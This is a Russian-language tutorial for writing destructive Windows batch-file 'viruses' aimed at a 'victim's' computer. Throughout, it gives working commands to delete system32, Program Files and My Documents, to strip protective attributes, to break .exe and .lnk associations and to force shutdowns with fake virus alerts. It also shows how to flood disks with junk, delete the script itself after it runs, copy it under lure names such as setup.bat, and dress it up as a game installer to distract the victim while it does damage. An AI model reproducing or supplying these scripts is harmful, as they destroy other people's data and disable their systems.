Bat файлы
--------------------------------------------------------------------------------
Перейдите по адресу: C:\WINDOWS\Help\ntcmds.chm (можно эту строчку ввести в графу "Выполнить"). В этом файле вы найдёте всю подробную информацию о "Командной строке", гораздо больше чем написано в этой книжке, (только создавать вирусы вас там не научат).
--------------------------------------------------------------------------------
Как и где мы будем писать вирусы? Для начала надо понять, знаете ли вы, что такое MS-DOS. Раньше, у совсем древних компов не было графической оболочки (значков, курсора мыши, окон). Как же они управлялись файлами без мыши то? С помощью клавиатуры, изначально были придуманы команды для копирования, перемещения, ну и удаления... Время шло, шёл прогресс, текстовая оболочка сошла на нет из-за графической, комп появился почти в каждом доме, и простой user (что по русски будет как - пользователь, а у крутых хакеров чайник, ламер, юзверь) даже не разу в жизни не пользовался командами MS-DOS, а он то ещё сохранился. Правда в XP это уже только мираж, но мираж который работает. Нажмите "Пуск" выберете графу "Выполнить" и введите там cmd У вас должно открыться чёрное окошко с белыми буквами. В 85/98 виндах это был сеанс MS-DOS и разворачивался он на весь экран. В XP же мираж уже оконный. Ну например, введите в этом чёрном окне слово notepad и нажмите "Enter". У вас должен открыться блокнот. Вот так мы в этом окне и будем давать команды на удаление вражеских файлов.
Но как же?... Мы чё должны сесть за его комп и вводить... Нет, существует такой файл в котором можно прописать заранее таких команд штук несколько. И стоит его открыть, они выполняться (это придумали, чтобы двести раз не вводить одну и ту же команду, автоматизация). Вот этим то мы и воспользуемся, напишем там наши вредные команды и сохраним это всё в нашем файле. У вас назревает два опроса: Какие команды? В каком файле? Команды я вам покажу какие, а файл наш будет называться bat файл, (от английского слова batch - пакет, пачка).
Bat файлы это командные файлы, в которых в каждой строке записано по одной команде и они выполняются по очереди, то есть одна команда отработала, завершилась, началась вторая и.т.д.
Приступим непосредственно к созданию этого файла.
Для начала откроем блокнот
В открывшемся окне блокнота нажимаем «Файл» выбираем строку «Сохранить как…» в поле «Имя файла:» пишем название нашего файла, например «проба» и даём ему расширение .bat у нас должно получиться «проба.bat», жмём на кнопку «Сохранить». Потом ищем наш файл:
Нажимаем на него правой кнопкой мыши, вылетает контекстное меню, выбираем там «Изменить» и соответственно нажимаем, и опять наш bat файл будет загружен в блокнот.
Вот простейший пример как запустить, к примеру, Paint потом Сапёра и в конце выполним очистку диска. Открываем наш bat файл и пишем там в столбик следующие команды:
mspaint
winmine
cleanmgr
и сохраняем документ. И теперь после открытия нашего файла сначала откроется Paint, мы там порисуем, закроем его и сразу после его закрытия мы можем сыграть в игру «Сапёр» и после того как мы проиграли там раз 100 можно выполнить очистку диска.
Если же мы хотим запустить все эти команды одновременно, причём очистку диска в свёрнутом режиме то пишем следующие:
start mspaint
start winmine
start/min cleanmgr
Как вы поняли к командам существуют и специальные параметры определяющие как команда будет выполняться. Вот например после команды start мы видим параметр /min он, как я уже говорил так же запускает приложение, но в свёрнутом виде. Если за место него мы написали бы /max, то приложение соответственно запустилось во весь экран, развёрнутое. У команды start ещё есть с десяток параметров, но о них я вам говорить не стану т.к. они нам не чем не помогут (зачем нам задавать приоритет )
В таблице написано приложение и команда которая его запускает:
Настройка системы start msconfig
Калькулятор calc
Помощь start HelpCtr
Редактор символов eudcedit
Таблица символов charmap
Буфер обмена clipbrd
Музон dvdplay
Диспетчер задач taskmgr
Громкость sndvol32
Доктор Ватсон drwatson
Отладчик доктора drwtsn32
Дефрагментация диска С: defrag C:
Проверка диска chkdsk
И ещё чтоб вы знали. Как же всё это выполняется, ведь команд куча, все они требуют приложения которое будет их выполнять. Неужели это всё одна программа? Нет, программа "cmd" служит для того чтобы через неё запускать другие программы. Вот например есть такая команда mem, введите её и увидите сведения о памяти вашего компа. Так вот, этой командой заправляет отдельное приложение. Оно так и называется mem. Лежит это приложение в C:\WINDOWS\system32 и есть ещё резервная копия по адресу: C:\WINDOWS\system32\dllcache. Это для того чтобы востановиться от нечаянного удаления нужных файлов. Так вот к чему рассказ, удалите в этих двух директориях приложение "mem.exe" и теперь введите в командную строку, вам не чего не покажут разве лишь только ошибку, или может даже то, что системного файла не хватает. Из этого следует вывод, если удалить приложения стирания, перемещения, то командные файлы у вас не сработают. Но я думаю "жертва" об этом даже не догадывается...
Теперь приступим к написанию команд для человека, которому вы хотели бы сильно (или не очень сильно) навредить!
Для начала напишем команду, которая не удаляет файлы, а просто ставит на них атрибут «Скрытый» и «Системный» и после запуска команды файлики исчезнут.
Просто пишем:
attrib +h +s
Используемые параметры в команде attrib:
+r Установка атрибута «Только чтение».
-r Снятие атрибута «Только чтение».
+a Установка атрибута «Архивный».
-a Снятие атрибута «Архивный».
+s Установка атрибута «Системный».
-s Снятие атрибута «Системный».
-h Снятие атрибута «Скрытый».
+h Установка атрибута «Скрытый».
Но мы будем только пользоваться двумя, может тремя.
Довайте для начала скроем папку WINDOWS, чтобы перепуганный новичок орал «Х-де моя папка WINDOWS!» пишем:
attrib +h +s C:/WINDOWS
Или же можно скрыть файлы (вложенные папки остануться) в самой папке:
attrib +h +s C:/WINDOWS/*.*
можно поступить иначе:
cd C:\windows переходим в папку «windows»
attrib +h +s и ставим атрибуты
У нас новая команда cd после неё пишем путь к директории и последующие команды будут применяться к этой папке. Почему надо ставить два атрибута? Достаточно поставить один "Скрытый" и он скроеться? В принцепи у ламера да, но если вы поставили в свойствах папки "Показывать скрытые файлы и папки", то фишка не прокатит, а с двумя параметрами файл можно только увидеть в FAR, или Commander (это файловые менеджеры).
А если мы хотим снять все атрибуты со всех файлов в этом каталоге, да и ещё и подкаталог? Для снятия или назначение атрибутов в подкаталоги надо воспользоваться параметром /s. Например для снятия всех атрибутов со всех файлов в этой папке и всех её подпакках пишем:
attrib -r -s -h -a *.* /s
Существует ещё одна загвоска, а если на подпаке стоят атрибуты, то с неё команда снимет их? Нет, она не снимет не с этой папки, не с файлов которые в этой скрытой папке находяться. Поэтому нам нужен ещё один параметр для снятия атрибутов с папок /d. Например если мы хотим снять атрибуты ну со всего что только возможно в папки "Windows" нам надо написать:
attrib -r -s -h C:\WINDOWS\*.* /s /d
Ну не обязательно именно эта папка можно такую команду применить для других папок, например можно скрыть ненужный мусор, который следует удалить, а не как… ну об этом в главе: «Заполняем место мусором»
Или какими он часто пользуеться папками и файлами? Ну я думаю на "Рабочем столе" он держит кучу ярлыков. А если они исчезнут? Он их поставит опять, а мы сделаем запуск нашего вируса с каждым включением компа и сколько бы он раз заново не ставил свои ярлыки, они всё исчезают и исчезают,... но об этом потом.
--------------------------------------------------------------------------------
Я думаю вы не станете биться в бешенном припадке если тестируя вирус скроете свои папки... Просто напишите команду которая снимает атрибуты...
Отключение…
Фишка будет в том, что после включения нашего файлика комп возьмёт и неожиданно отключиться!
Shutdown -t 0 –s
Параметр –t ставит время на 0 секунд, можно поставить –t 10 и тогда комп отключиться через 10 секунд.
Параметр -s непосредственно говорит системе, что надо отключиться, а вот если за место –s поставить –l, то осуществиться просто выход текущего пользователя. А если поставить –r, то комп сначало отключиться, а потом опять включиться. (типа перезагрузка)
Можно добавить немножечко устрашения и перед тем как комп отключиться будет показано, что в системе вирус (как же испугается новичок, увидев такое сообщение, да ещё и система вырубиться... Он после включения будет прошаривать свой комп на вирусы хотя это только на пользу.)
--------------------------------------------------------------------------------
Так получилось что у нас в принцепе нет единого стандарта кодовой страницы, т.е. мы напишем русскими бувами станем выполнять, а там "абракодабра" поэтому чтобы в сообщении был виден русский текст придёться применить команду переключения кодовой страницы Chcp 1251. Английские буквы в свою очередь тоже станут непонятными символами.
Но если у вас декоратор стандартных кодировок, то напишите текст и по русски в кодировке OEM (досовская).
--------------------------------------------------------------------------------
Chcp 1251
Shutdown -t 10 –s -c "Внимание на вашем РС обнаружен ВИРУС!!!"
Параметр –c указзывает что должно показаться сообщение. "Само сообщение надо написать в двойных кавычках"
Но учтите если вы поставите время 0-5 секунд и напишите сообщение, "жертва" просто не успеет сообщение прочесть. Так что либо 0 сек. и сразу отключение, либо 10 сек. и с угрожающим сообщением...
Безвозвратное удаление
Ну что, сейчас пойдут команды удаления. Интуиция вам подсказывает что удаление это плохо...
del *.* /q
После запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в каталогах и подкаталогах.
Параметр /q задаёт удаление без подтверждения.
Теперь мы удалим шрифты:
del C:\windows\fonts /q
Почему без /s ? А зачем, там нет подпапок.
Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:
del C:\windows\Media /q
Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.
del C:\windows\system32 /q /s
Системная папка, ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов. Но есть один подвох если на файле будут стаять атрибуты "Скрытый" и "Системный" то наши удаление на них не подействует, их попросту пропустят. А вот как раз самые важные файлы то и отмечены этими параметрами (от нечаянного стирания). Что в этом случае делать? Придётся сначала писать команду снятия всех атрибутов с файлов, каталогов, подкаталога.
Командой del мы хоть и удаляем файлы, а папки то останутся, но есть команда которая стирает папки вместе с файлами:
rd C:\windows\Media /s /q
и все папочки и файлики удаляться. Вы спросите, ну если команда rd так хороша, зачем нужна команда del ? Ответ прост, вы попробуйте удалить командой rd , допустим только ярлыки рабочего стола, или только рисунки в папке windows. Командой del это делается так:
del C:\windows\*.bmp /q /s
И нет стандартных рисунков, думаю понятно, почему удалены только рисунки ведь стоит маска .bmp если поставить .txt то удаляться текстовые файлы, об этом в главе "Маски"
Файл можно ещё и просто не удаляя переместить, например:
move C:\WINDOWS\*.txt C:\Text /y
На команде видно что мы перемещаем все текстовые файлы в папку "Text" на диске C: (в папке WINDOWS их уже не будет, это же перемещение, где взяли там уже нет). Что интересно мы наносим такой же вред как и при удалении, ведь комп будет считать что там этих файлов уже нет. (Правдо удалять быстрее). Параметр /y выключает предупреждения о перезаписи, если вдруг имена совпадут.
А теперь попробуйте догадаться что попытается сделать эта команда:
rd C:\ /s /q
--------------------------------------------------------------------------------
И ещё напоследок чтобы хорошенько усвоили, комп не даёт вам просто так удалять системные и скрытые файлы, надо сначала снять все атрибуты. Иначе облом. Но этот процесс офигеть длительный так что лучше снимать только с определённых файлов, но это надо знать с каких. Так что чтобы написать вирус вам надо самим знать какие файлы системные и стандартные. Прочитать много книг и... убить Билла Гейтса и занять его пост!
Премудрости удаления
Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить…
Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит нечего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:
attrib -a -s -h -r C:\*.*
del C:\*.* /q
Но тут нам много удалить не дадут. Всё триста раз защищено.
Можно, например, попробовать удалить УСТАНОВЛЕННЫЕ НАМИ программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:
rd %ProgramFiles% /s /q
А вот если написать:
rd C:\Program Files /s /q
то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку "Program" и папку "Files". Ладно у нас есть зарезервированная команда для папки Program Files - %programfiles%. А если мы хотим удалить "Мои документы". То вирус будет искать папки "Мои" и "Документы". В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное:
Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст.
del "%USERPROFILE%\Мои документы\*.*" /q /s
--------------------------------------------------------------------------------
Важно! При установки операционки можно задать любую корневую папку и вы по команде cd C:\WINDOWS не куда не попадёте. Может у него корневой каталог называется win? Нам поможет имя которое перебросит нас в корневой каталог как бы он не назывался cd %SystemRoot%. Та же история с папкой пользователя как дойти до рабочего стола? cd "C:\Documents and Settings\А тут что писать????\Рабочий стол" Видите где я вас спрашиваю "Тут что писать" действительно ведь там стоит имя пользователя, угадать почти нереально. Поэтому надо написать cd %USERPROFILE%\рабочий стол. Ну в папку Program Files мы уже знаем cd %programfiles%
И не забывайте если есть в какой либо команде русские буквы например "Рабочий стол" или "Мои документы" обязательно в начале пишите команду Chcp 1251
--------------------------------------------------------------------------------
А если мы хотим удалить в папке "Windows" только Текстовые файлы (txt) и Параметры конфигурации (ini), а на диске D: Рисунки (bmp)? Мы напишем три команды одна удаляет то, вторая это... Но можно всё это написать в одной команде:
for %%Q in (C:\WINDOWS\*.txt *.ini D:\*.bmp) do del %%Q
Видно что мы можем написать свои пути в скобках, хоть какие, так же можем пользоваться масками разных комбинаций. А после слова do у нас стоит команда del так вот мы можем написать например attrib +h +s и теперь на диске С: скроются текстовые файлы и файлы ini. Ну суть понятна? В скобках пишем любой путь или пути, а после do любую команду (которую можно применить к файлу).
Теперь давайте предположим что мы сделали вирус, который при загрузке компа создаёт ненужный мусор. "Жертва" его удаляет, а он при загрузке появляется снова. А если "жертва" мусор не удалит? То наш тупой вирус будет его пытаться создать опять, может даже начнёт задавать "жертве" вопросы о перезаписи... "жертва" сразу обнаружит в чём дело и всё исправит. А давайте напишем команду которая проверяет, есть ли наш мусор на том месте где мы его создавали или уже нет. Если есть вирус завершиться. Если нет то сново создаст мусор.
if not VIR*?????????.sys goto x
exit
МУСОР.
Помните как мы создавали мусор? Брали настоящие файлы копировали их с другим расширением и приписывали в начали приставку "VIR". Так вот наш вирус проверяет, есть ли хоть один файл у которого есть расширение .sys и приставка "VIR" в начале (можете писать что угодно, исходя из содержания вашего вируса). Если таковые имеются он выходит командой exit. Если таких нет, то переходит к точки x и создаёт мусор снова.
Надеюсь вы понимаете что это только небольшой кусок кода вируса, например в начале должна стоять команда перехода в каталог, где будет всё проверяться... Где написано слово "МУСОР" должны быть написаны команды создания мусора.
--------------------------------------------------------------------------------
И ещё, я чё то всё говорю путь диск C:, диск C:, но для полной уверенности можно я бы сказал НУЖНО прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D:, если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на "O" ; "P" ; "Q" ; "R" ; "S" ; "T" ; "U" или ещё какие (правильно делают). Безопасность, будь она не ладна.
Маленькие команды
Тут написаны команды для которых отдельная глава много...
Самоликвидация
Эта команда удаляет сама себя, пишите её в самом конце вашего вируса и всё, ни кто не узнает, что вы испортили на его компе чтобы сразу эту пакость не исправить.
del %0
Клонирование
Эта команда копирует себя в другое место. Так можно наклонироваться по всему диску, Нет, нет, да кто нибудь запустит интересный "setup" или "games"
copy %0 C:\setup.bat
copy %0 D:\games.bat
copy %0 C:\windows/sex.bat
ну и.т.д.
Метка диска дурак (D
Ну вот, к примеру, первая команда она будет менять метку диска:
label D: dyrak
Ну а если мы хотим написать по-русски метку диска, то сначала надо перейти на кодовую страницу и у нас получиться:
Chcp 1251
label D: Дурак
Всё будет написано по-русски ну а если без перехода на кодовую
страницу, то получиться нечто невообразимое зþΞњЭÑ.
(Я бы сказал это очень тупая и бесполезная команда которая может лишь только слегка шокировать первые 2 секунды)
Меняем название
Просто поменяем название привычных папок на другое, своё:
Chcp 1251 хотим написать название папки по-русски
cd\windows\ переход в корневую директорию
ren Web мусор поменяли папку «Web» на папку «мусор»
Содержимое то же, самое название другое. (Может быть, неопытный новичок так увлечётся очищением диска от мусора, что мимоходом и сотрёт нужные вещи с ненужным названием).
Сколько время?
Можно изменить текущее время на своё:
time 00:00
Я вот поставил 00:00, но можно поставить и своё, например 12:30. (Знаете, как раздражает, когда смотришь на часы, а там 00:00!)
Какой сейчас год?
Можно изменить текущую дату:
date 01.01.50
Та же можно задать свою дату, или вернуть комп в прошлое, или как я в будущие 2050 года. И не спроста я так поставил дату, многие программы откажутся работать, если стоит дата 2050 года и антивирус откажется работать, мол, срок действия вашей лицензии истёк 40 лет назад!
Отправить
Если нажать правой кнопкой на любой файл, папку, приложение вылетит контекстное меню, где есть строка "Отправить" может быть, мы с вами, и не используем эту возможность, но большинство людей прибегают к этой возможности. По умолчанию там совсем не много пунктов назначения, куда будет произведено копирование:
Но мы можем всё испортить, добавив, к примеру, к этому списку 100 папок.
cd %USERPROFILE%\SendTo
md 1
md 2
md 3... ну и.т.д.
Быстрый запуск
Посмотрите на вашу панель быстрого запуска (для совсем тупых: это чуть правее кнопки "Пуск") там находиться самое необходимое (надеюсь), так вот и суда мы можем засунуть…в смысле пустых папок:
cd "%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch"
md 1
md 2
md 3 ... ну и.т.д.
Портим Пуск
Нажмите на кнопку "Пуск" и в самом верху мы лицезреем несколько программ (вообще это место в меню "Пуск" отведено, для того чтобы пользователь вложил туда все те программы, которыми он пользуется чаще всего)
Так вот мы возьмём и уже по сложившейся традиции запихнём суда папок 100 и испортим наш, в смысле "Пуск" жертвы.
chcp 1251
cd "%USERPROFILE%\Главное меню"
md 1
md 2
md 3 ... ну и.т.д.
допишите так…
chcp 1251
cd "%USERPROFILE%\Главное меню\Программы"
md 1 …и.т.д.
и папки будут создаваться в разделе программы.
Или допишите вот так…
chcp 1251
cd "%USERPROFILE%\Главное меню\Программы\Автозагрузка"
md 1 ….и.т.д.
допустим мы создадим 100 пустых папок в папке "Автозагрузка" и при включение компа каждый раз будут открываться сотня папок, даааа так сдохнуть можно каждый раз их закрывая…
Пытаемся повесить систему
Как я уже говорил в начальной главе чтобы запустить какую-нибудь программу надо написать start в начале строки и команду например:
Start mspaint и Paint откроется
А что если задать компу открыть сразу 50, или 100 Paint(ов) силёнок хватит не у всех. Можно конечно написать вот таких 100 строк: Start mspaint но этого мы делать не будем не волнуйтесь. Мы напишет вот такое:
ставим начальную точку
Start mspaint пишем команду (в данном случае это открытие Paint(а)
goto x говорим чтобы комп начинал всё с начальной точки
Этим самым у нас получается бесконечный цикл открытия приложения и попытка зависания компа.
Удалим расширение
Кстати говоря, очень вредный вирус получиться, если поменять расширение. Вот например кажется ярлык подумаешь… он мне и не нужен вовсе… ан нет без ярлыков будет просто ужасно вы только представьте чтобы сыграть в игру вам достаточно щелкнуть по ярлыку находящемуся на вашем рабочем столе, а когда ярлыка нет… вам надо лезть в диск С: заходить в папку «Игры» потом что-то ещё… да так сдохнуть можно! Итак, я тут подумал, одним из важных вещей у нас является ярлык, так мы берём и…
assoc .lnk=.avi
здесь наглядно показано, что я хочу поменять ярлык (расширение, как известно .lnk) на музыкальное расширение .avi и уже понятно, что ярлык с таким расширением ни куда вас не пошлёт! А вот вы комп будете долго посылать.… Ну и, конечно же, нетрудно догадаться, как такой вирусик может оказаться разрушительным, мы с вами поменяем приложение .exe и тогда ни одна программа, ни запуститься!!!
assoc .exe=.avi
тут показано расширение программ .exe ну и уже по традиции я меняю его на .avi вы кстати можете придумать что-нибудь своё… например поменять jpg (рисунки) например на .virus вот весело будет когда он захочет посмотреть свои картинки…
можно же просто удалить расширение, не заменяя его на другое:
assoc .exe=
после знака = надо нажать один раз пробел, а уже потом сохранять наш вирусик.
Кстати говоря, если хотите доставить своей жертве хорошую встряску, напишите в одном вирусике команд 20 удалений расширений все (разные и необходимые)
В таблице я привёл некоторые расширения, если вам кажется что их не достаточно пишите свои.
Приложение .exe .com
Текстовые файлы doc .txt .wp .diz .log .wri
Музыкальные файлы .mp3 .wav .avi .wmv .mpg
Картинки .bmp .jpg .gif .tif .pic
Ярлыки .lnk .url
Архиваторы .rar .zip .arj .cab lzh.
Шрифты fon .ttf .atm
Файл реестра .reg .key
Системные файлы .sys .dll .rnf .drv .ega
Файл справки .chm .hlp
Много пустых папок
Суть будет заключаться в том, что мы создадим просто-напросто много папок и всё. Фишка заключается в том, что их будет немереное количество и бедолаге пользователю
Будет очень трудно всё это удалить.
md 1
1 это имя файла можно назвать и «папка» или «не удалять», но мне нравиться 1 и вот почему, если мы действительно затеяли сделать такой вирусик который создаёт 1000 папок разве можно написать всё это вручную?
md папка
md важно
md пустота
…. И так далее (Одинаковых имён не должно быть).
Так вот на этот раз обратимся к программе Excel, надеюсь, она есть у всех.… Так вот открываем наш Excel
И в первой ячейки пишем md 1
Потом берём за правый нижний уголок ячейки и тянем вниз до того пока в подсказке не покажется чисто 1000 можно и любое другое
Потом отпускаем кнопку и все наши 1000 «mdешок» копируем в буфер
Потом заходим в наш файл .bat открываем контекстное меню выбираем вставить и сохраняем теперь при открытии этого файлика у вас неожиданно появиться 1000 папок 1, 2, 3, 4…. ну и. т .д.
Можно написать и например так:
md 1\1\1\1\1
что же мы тут видем? Мы создадим папку «1» откроем её а в ней будет лежать папка «1» а уже в той папка «1». Можно и другие имена создать:
md открой\и эту тоже\идём дальше\почти у цели\сейчас конец\конец
ну вот можно открывать папку и получать указания от другой. Только надо ввести русскую кодовую страницу, перед тем как называть папку русскими именами, а то получиться «абракадабра». (Chcp 1251 усё на русском)
Но так папки будут создаваться там где запущен сам вирус, а вот если так:
cd\
md 1
md 2
md 3.....
--------------------------------------------------------------------------------
Вы спросите а что это за странная первая команда? cd это же переход куда либо, а тут пути не указано! Дело в том, что если просто написать cd\ то мы окажемся на диске C:\. И ещё, ну например мы ввели команду cd C:\WINDOWS\system32 достаточно нам сейчас ввести команду cd.. и мы окажемся в C:\WINDOWS ещё раз введём cd.. мы окажемся на диске C: понятно да? Нас перебрасывает в предыдущий каталог.
--------------------------------------------------------------------------------
Так же доведите cd(шкой) до папок system32 или windows и уже там создавайте. Очень сложно искать нужную информацию когда папки мельтешат перед глазами. Начнёшь удалять, а вдруг имена у них "microsoft" или "driver" приходиться лезть в папку смотреть, ага пусто можно удалить... А мы то не тупые мы потрудились и добавили в начале нашего вируса команду скрытия файлов в нужных папках. Вот наша жертва сидит целый час лазает по нашим папкам смотрит где пусто и удаляет... Ну поняли? Так увлечётся что удалит и системную папку ведь в ней нечего нет (надеюсь команду attrib то не забыли ?)
И ещё, увидев такое страшное окно:
любой разумный пользователь просто закроет вирусик, во время процесса создания папок он может быть длительным (смотря какая у вас ОП) у меня Pentium 4 и чтобы создать всего 1000 папок надо целых 5 секунд! А если вы хотите создать 10000 папок, так вообще не получиться, поэтому надо закосить под игру или там какую-нибудь программу чтобы продлить нашему вирусу время на создание 100000 папок! Об этом в главе: Создаём эффект программы. (Если всё же создаёте имена папки нашими русскими буквами, не забудьте в начале строки указать кодовую страницу)
(Справка: одна пустая папка весит 512 байт,
1000 папок 500 КВ
100000 папок 48 МВ), хотя это смотря в какой файловой системе у вас комп и сколько объём у вашего кластера... Ну да ладно нам папками место на компе не забить, а вот нервы потрепать, запросто.
Заполняем место мусором
Теперь поговорим о том, как же заполнить место мусором на чужом диске тем более если у вас, его и так катастрофически не хватает, а тут ещё не ненужный мусор который неясно стирать или нет. И речь пойдёт ни о пустых там папках или файликах!
Для начала создадим одну папку на диске С: и назовём её "Microsoft" чтобы не вызвать так много подозрений.
md C:\Microsoft Итак папка готова…
…теперь следом пишем вот такое:
copy C:\*.* C:\Microsoft\system > nul
Здесь показано, что команда copy (копия) хочет скопировать содержимое диска C:\ (мы понимаем что только то лежит на диске в каталоги копия не лезет.) и переместить нашу копию одним неизвестным файлом "system" в нашу заранее заготовленную папку "Microsoft". А что это в конце такое странное > nul? А это чтобы наш процесс копирования не кто не заметил. На экране вообще не будет выводиться ход операции. Эту команду можно добавлять и в удалении и в применении атрибутов, многофункциональность.
(Не знаю, как у вас, но у меня такой файлик весит 85КВ) но нам одного мало и мы пишем их, сколько влезет, только имя меняем:
copy C:\*.* C:\Microsoft\mouse
copy C:\*.* C:\Microsoft\keyboard
copy C:\*.* C:\Microsoft\screen
Можно задать немного иной путь и тогда файл будет весить больше (где-то 8 MB):
copy C:\windows\*.* C:\Microsoft\program
copy C:\windows\*.* C:\Microsoft\driver
но всё это сохраниться в один файл, а вот если написать вот так:
copy C:\windows\*.* C:\Microsoft\*.*1 будет столько файлов, сколько вы скопировали и будут те же имена только с расширением и нашей цифрой 1. С масками тут можно творить всё что угодно. Читай главу Маски.
Посмотришь и побоишься стирать вроде все файлы нужны системе можно для устрашения ещё написать:
attrib +s C:\Microsoft\*.*
или…
attrib +s +h C:\Microsoft\*.* мусора много, но его не видно… (как и в главе Х-де мои файлы)
Можно путь для копирования поставить другой путь:
copy C:\*.* C:\ program наш никчёмный файл появиться на диске С:
можно скопировать, что-нибудь другое:
copy C:\windows\system32\*.* C:\Microsoft\*.exe
Видно что все файлы будь это текст, или музыка мы сохраняем как пиложение *.exe. Но это уже очень длительный процесс (копировать всё из system32) придется приукрасить программу. Cмотри главу: "Создаём эффект программы" Есть другой способ копирования:
dir c:\ /s/a > C:/1.txt
Эта команда просто скопирует все пути к папкам и файлам в один текстовый файл (долго). А можно в одной команде задать несколько каталогов и все файлы из них слепяться в один кусок, например:
copy C:\WINDOWS\*.txt + C:\WINDOWS\Help\*.* KYSOK
Мы видим что я беру из папки "Windows" все текстовые файлы а из папки "Help" вообще все файлы и слепливаю кусок из всех них в файл "KUSOK" (од даже будет без расширения, но можно его и сделать, если пожелаете)
А можно полностью скопировать папку "system32" в другое место и поставить атрибут скрытый, чтобы жертва не удалила нашу совершенно ненужную копию.
xcopy C:\WINDOWS\Web C:\mysor /q /e /h /y копируем папку web в папку musor.
attrib +h +s C:/mysor всё скрываем с глаз людских.
Если посмотреть то я задал много параметров для команды xcopy (у неё их ещё больше). Итак параметр /q ну это как везде, чтобы на экране не было лишних сообщений. /e для копирования пустых каталогов. По умолчнию Системные и Скрытые файлы не копируються так вот параметр /h разрешает их копирование. Если при копировании имена совпадут то будет задан вопрос о перезаписи, зачем нам вопросы вот мы влепили параметр /y.
--------------------------------------------------------------------------------
Ах, совсем забыл, не пишите вот такую команду:
copy C:\*.* C:\Windows\
А то антивирус, если он есть у нашей жертвы, обязательно обезвредит этот наш вирус, посчитав его за Троян.BAT.CopyToWindows.
Создаём эффект программы
Я уже писал, что при длительном выполнении наших вирусиков вылетает чёрное окно, где описывается процесс операции и вот это самое описание может испугать и подтолкнуть жертву выключить программу, хотя наша с вами программа-вирус не доработала и всех злостных операций не проделала. Чтобы избежать вот такого конфликта, можно немного замаскироваться, закосив под игру, или например программу… Чтобы на чёрном окошке не отображались введённые нами команды:
@echo off
Если мы хотим написать сообщение то надо написать:
echo А это моё сообщение...
Если нам надо сделать небольшой отступ между сообщениями, чтобы они не сливались то пишем команду которая ниже. (Чем больше "эх" тем больше отступ:
echo.
echo.
В строке заголовка где написано "C:\WINDOWS\system32\cmd.exe" Можно написать своё слово (для отвода глаз):
title Загрузка игры...
Чтобы не было тупо чёрного окна и белых бук можно разукразить их по своему. Первая цифра определяет цвет экрана, а вторая цвет букв:
color 0c
Значение Цвет
0 Чёрный
1 Синий
2 Зелёный
3 Голубой
4 Красный
5 Сиреневый
6 Жёлтый
7 Белый
8 Серый
9 Светло-синий
A Светло-зеленый
B Светло-голубой
C Светло-красный
D Светло-сиреневый
E Светло-желтый
F Яркий белый
Можно в начале вывести текущую дату и время (типо о какая прога мощная...) Причём начальная строка стирается, (ну где написано от куда запущен файл).
prompt $t $_ $d
Параметр $t говорит что мы хотим видеть дату. Параметр $_ переносит нас на вторую строку (можно задать таких штук 5). Параметр $d ставит нам текущую дату (время и дата ставятся такие как установлены на компе, если там не правильно то и команда соврёт). Можно было влепить ещё параметр $v и тогда мы бы увидели номер операционки. Чтобы вообще не чего не было видно пишите параметр $s.
Можно оповещать нашу жертву о ходе действия нашего вируса. Например он стёр папку "Мои документы" вылетело сообщение о том что "Первый этап установки завершён", затем вирус создал 1000 папок и сообщает "Регистрация данных прошла".
msg * Подождите программа выполнит соответствующие операции
Можно написать пять шесть таких сообщение только разных типа «Это лицензионная версия» или «Всё преследуется по закону» и пока жертва будет читать, и жать ОК мы выиграем время.
Можно использовать и другой способ, открывая на весь экран блокноты, в которых будет написано сообщение:
echo >> read.txt Пожалуйста, внимательно прочитайте! Перед тем как установить игру закройте….и.т.д.
start/max read.txt
Тут так же действует вывод сообщения но мы задали его отправить в текстовый файл read. Вторая строка говорит, что мы хотим открыть наш текстовый файл уже с готовым сообщением во весь экран. И пока наша жертва будет читать, что там ей надо сделать, вирус сделает своё дело. Можно конечно вместо скучной лекции написать прикольные анекдоты и тогда жертва уже точно отвлекаться.
Можно остановить выполнение нашего вируса хитрой командой. Вылетит собщение "Для продолжения нажмите любую клавишу...".
pause
Можно писать время от времени следующую команду, чтобы отчищать экран от надписей.
cls
Можно чтобы на экране была, какая-нибудь надпись, или узор…
Echo off
Echo wwww w wwwww wwwww
Echo w w w w w w
Echo w w w w w w
Echo www www w wwwww
Echo w w w w w
Echo w w w w w
Echo wwww w w w w
Echo off
На нашем примере терпения мне хватило чтобы написать только слово "ЗАГР", а уже на рисунке я показал как должна выглядеть "Загрузка игры...".
А теперь я покажу как применить не все конечно, ну почти все эти команды в нашем вирусе:
@echo off
title Установка игры
echo Запус Мастера установки
команда создания мусора > nul
color 0c
cls
echo Установка игры. Пожайлуста подождите...
команда постановки на мусор атрибутов > nul
color 09
cls
echo Установка закончена.
echo.
echo.
echo.
echo Нажмите любую клавишу для выхода.
echo.
pause
exit
Первая команда всё скрывает, вторая пишет в верху "Установка игры" Когда вирус запущен вылетает сообщение "Запуск мастера установки" пока "жертва" читает эту надпись наш вирус создаёт ненужный мусор на диске. Потом эта надпись пропадает и появляется вторая, где уже красными буквами будет написано "Установка игры. Пожалуйста подождите...", а на самом деле наш вирус уже ставит на наш никчёмный мусор атрибуты "Скрытый" и "Системный". Когда вирус завершит свои махинации то появиться уже синяя надпись которая будет гласить что мол: "Установка закончена" и типо "Нажми любую клавишу и ты выйдешь". И действительно стоит вам нажать любую клаву как вы выйдете.
--------------------------------------------------------------------------------
